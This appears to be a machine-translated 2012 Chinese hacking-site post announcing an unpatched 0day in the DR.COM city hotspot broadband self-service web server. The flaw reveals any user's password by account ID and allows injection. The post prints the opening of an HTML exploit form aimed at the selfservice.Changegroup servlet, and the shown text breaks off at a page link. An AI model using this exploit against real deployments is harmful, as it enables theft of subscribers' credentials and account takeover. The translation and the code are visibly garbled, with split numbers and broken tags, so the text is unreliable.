DR. COM city hot GetPassword-0day vulnerabilities&exp-vulnerability warning-the black bar safety net

2012-06-22T00:00:00
ID MYHACK58:62201234163
Type myhack58
Reporter 佚名
Modified 2012-06-22T00:00:00

Description

DR. COM city hot spot broadband

Many cities have used this? The city, the government, enterprises, Operators, universities and so on.. With this Suite of software to provide access to broadband service

A recent study, found a vulnerability, 在DR.COM USS user self-service log in theWEB server

You can directly view to the specified ID the user's password, i.e. the password vulnerability, at the same time, also can be directly injected. Has been submitted to the official, no fruit, would like to early repair to prevent illegal hacking off the pants.

Of course if the login page without the CAPTCHA words, but also can be exhaustive, this will not say

The source code to see it,

The figure is made simple using the page.

Source:

<html><head><title>DR.COM!& amp;hackdn-GetPassword Blackdos! </title>

</script>

<span id="theText" style="width:1 0 0%">

<h1><center><font color=#FFF8DC>DR.COM!& amp;hackdn-GetPassword Blackdos!& lt;/font></center></h1></span>

<br>

<body background="http://www.senai.br//upload/publicacoes/edu.jpg" bgcolor="#0 0 0 0 0 0" text="#6 6 6 6 6 6" onkeydown="onKeyDown()" oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

<script language="JavaScript">

var bgOS = 0;

var bgOB = eval('document. body');

function SlBg(Saidai) {

bgOS = bgOS + 1;

if (bgOS > Saidai) bgOS = 0;

bgOB. style. backgroundPosition = "0" + bgOS;}

var ST = window. setInterval("SlBg(1 0 0)",3 3);

</script>

</body></html>

<center><font face="that are in the Wingdings" color="white" style="font-size: 230pt">N</font><span class="style1"><span style="font-weight: 4 0 0"><font face="Impact" color="white" style="font-size: 100pt"></font></center>

<FORM NAME="form1" method="post" ACTION="http:// 用户 自助 服务 网址 /servlet/selfservice.Changegroup?fid=1002" >

<table width="1 0 0%" border="0" cellspacing="0" cellpadding="0">

<tr height="2 0">

<td align="center" bgcolor="" height="0">

</td>

</tr>

<tr style="display:none">

<td>

<!-- Hidden fields -->

</td>

</tr>

<tr>

</td>

</tr>

<td>

<table bgcolor="" width="5 9%" height="1 5 0" border="0" align="center" cellpadding="0" cellspacing="0">

<tr>

<td width="2 0%" align="center"> </td>

<td width="8 0%">

</td>

</tr>

<tr>

<td width="2 0%" align="center">&nbsp&nbsp&nbsp&nbspID:&nbsp;</td>

<td width="8 0%">

<input type="text" name="Account" maxlength="2 6" size="2 6">

</td>

</tr>

[1] [2] next